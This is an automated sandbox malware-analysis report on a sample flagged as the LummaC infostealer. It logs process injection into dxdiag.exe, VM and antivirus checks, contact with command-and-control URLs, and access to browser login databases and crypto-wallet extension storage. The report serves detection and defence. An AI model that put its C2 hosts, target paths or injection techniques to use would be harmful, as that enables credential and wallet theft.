https://fixxyplanterv.click/jh
Source: dxdiag.exe, 00000001.00000003.1921681897.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921228817.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921443405.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921325690.0000000003450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/la
Source: dxdiag.exe, 00000001.00000003.1924594667.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1925146540.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1924702653.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922204202.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921681897.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1923050702.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921228817.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922641260.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1923396438.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1923653553.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1923498896.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1924143105.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921443405.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922521115.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1923232078.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1924823683.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922785286.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921325690.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922340035.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922026178.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1923981712.0000000003450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/ob
Source: dxdiag.exe, 00000001.00000003.1921681897.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921228817.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921443405.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921325690.0000000003450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/obC3
Source: dxdiag.exe, 00000001.00000003.1902872299.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000002.1972698531.000000000346D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1945462618.000000000346A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/pi
Source: dxdiag.exe, 00000001.00000002.1972096748.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1971023716.00000000033E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click:443/api
Source: dxdiag.exe, 00000001.00000003.1905255414.0000000003443000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: dxdiag.exe, 00000001.00000003.1880877586.00000000057BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: dxdiag.exe, 00000001.00000003.1904583976.000000000588B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: dxdiag.exe, 00000001.00000003.1904583976.000000000588B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: dxdiag.exe, 00000001.00000003.1891642214.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1881150545.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880966948.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880877586.00000000057BC000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1891476501.00000000057B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: dxdiag.exe, 00000001.00000003.1880966948.0000000005790000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: dxdiag.exe, 00000001.00000003.1891642214.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1881150545.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880966948.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880877586.00000000057BC000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1891476501.00000000057B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: dxdiag.exe, 00000001.00000003.1880966948.0000000005790000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: dxdiag.exe, 00000001.00000003.1905255414.0000000003443000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: dxdiag.exe, 00000001.00000003.1879375132.000000000578F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880103801.0000000005778000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: dxdiag.exe, 00000001.00000003.1905255414.0000000003443000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: dxdiag.exe, 00000001.00000003.1879375132.000000000578F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880103801.0000000005778000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: dxdiag.exe, 00000001.00000003.1904583976.000000000588B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: dxdiag.exe, 00000001.00000003.1904583976.000000000588B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: dxdiag.exe, 00000001.00000003.1904583976.000000000588B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: dxdiag.exe, 00000001.00000003.1904583976.000000000588B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: dxdiag.exe, 00000001.00000003.1904583976.000000000588B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.4:49737 version: TLS 1.2

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/0@1/1

Source: WSLRT.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\WSLRT.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: dxdiag.exe, 00000001.00000003.1880471015.0000000005794000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1891642214.0000000005761000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: WSLRT.exe	Virustotal: Detection: 58%
Source: WSLRT.exe	ReversingLabs: Detection: 55%

Source: unknown	Process created: C:\Users\user\Desktop\WSLRT.exe "C:\Users\user\Desktop\WSLRT.exe"
Source: C:\Users\user\Desktop\WSLRT.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Users\user\Desktop\WSLRT.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior

Source: C:\Users\user\Desktop\WSLRT.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WSLRT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: WSLRT.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: WSLRT.exe

Static file information: File size 12697600 > 1048576

Source: WSLRT.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x9ff800
Source: WSLRT.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x13ba00

Source: WSLRT.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: WSLRT.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: WSLRT.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: WSLRT.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: WSLRT.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: WSLRT.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: WSLRT.exe	Static PE information: section name: .fptable
Source: WSLRT.exe	Static PE information: section name: _RDATA

Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03452564 pushfd ; iretd	1_3_03452565
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03452564 pushfd ; iretd	1_3_03452565
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03452564 pushfd ; iretd	1_3_03452565
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03452564 pushfd ; iretd	1_3_03452565
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03452564 pushfd ; iretd	1_3_03452565
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03457134 push eax; retf	1_3_03457135
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03457134 push eax; retf	1_3_03457135
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03457134 push eax; retf	1_3_03457135
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03457134 push eax; retf	1_3_03457135
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03457134 push eax; retf	1_3_03457135
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03452564 pushfd ; iretd	1_3_03452565
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03452564 pushfd ; iretd	1_3_03452565
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03452564 pushfd ; iretd	1_3_03452565
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03452564 pushfd ; iretd	1_3_03452565
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03452564 pushfd ; iretd	1_3_03452565
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03457134 push eax; retf	1_3_03457135
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03457134 push eax; retf	1_3_03457135
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03457134 push eax; retf	1_3_03457135
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03457134 push eax; retf	1_3_03457135
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03457134 push eax; retf	1_3_03457135
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03452564 pushfd ; iretd	1_3_03452565
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03452564 pushfd ; iretd	1_3_03452565
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03452564 pushfd ; iretd	1_3_03452565
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03452564 pushfd ; iretd	1_3_03452565
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03452564 pushfd ; iretd	1_3_03452565
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03457134 push eax; retf	1_3_03457135
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03457134 push eax; retf	1_3_03457135
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03457134 push eax; retf	1_3_03457135
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03457134 push eax; retf	1_3_03457135
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03457134 push eax; retf	1_3_03457135
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 1_3_03452564 pushfd ; iretd	1_3_03452565

Source: WSLRT.exe

Static PE information: section name: .text entropy: 6.955121861927559

Source: C:\Windows\SysWOW64\dxdiag.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\SysWOW64\dxdiag.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\SysWOW64\dxdiag.exe TID: 3064	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe TID: 5244	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\dxdiag.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: dxdiag.exe, 00000001.00000002.1972096748.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1971023716.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1971023716.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000002.1972096748.00000000033BC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\SysWOW64\dxdiag.exe

Process information queried: ProcessInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\WSLRT.exe

Memory allocated: C:\Windows\SysWOW64\dxdiag.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\WSLRT.exe

Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\WSLRT.exe	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\WSLRT.exe	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\WSLRT.exe	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 43E000	Jump to behavior
Source: C:\Users\user\Desktop\WSLRT.exe	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 441000	Jump to behavior
Source: C:\Users\user\Desktop\WSLRT.exe	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 451000	Jump to behavior
Source: C:\Users\user\Desktop\WSLRT.exe	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 452000	Jump to behavior
Source: C:\Users\user\Desktop\WSLRT.exe	Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 2F05008	Jump to behavior

Source: C:\Users\user\Desktop\WSLRT.exe

Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\dxdiag.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\WSLRT.exe

Code function: 0_2_00007FF73E9FE1EC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF73E9FE1EC

Source: C:\Windows\SysWOW64\dxdiag.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: dxdiag.exe, 00000001.00000003.1971023716.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000002.1972096748.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1939795183.0000000003459000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\SysWOW64\dxdiag.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: dxdiag.exe PID: 2596, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: dxdiag.exe	String found in binary or memory: Wallets/Electrum
Source: dxdiag.exe	String found in binary or memory: Wallets/ElectronCash
Source: dxdiag.exe	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: dxdiag.exe	String found in binary or memory: window-state.json
Source: dxdiag.exe, 00000001.00000003.1902872299.0000000003450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: pdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wa
Source: dxdiag.exe	String found in binary or memory: Wallets/Exodus
Source: dxdiag.exe	String found in binary or memory: Wallets/Ethereum
Source: dxdiag.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: dxdiag.exe	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
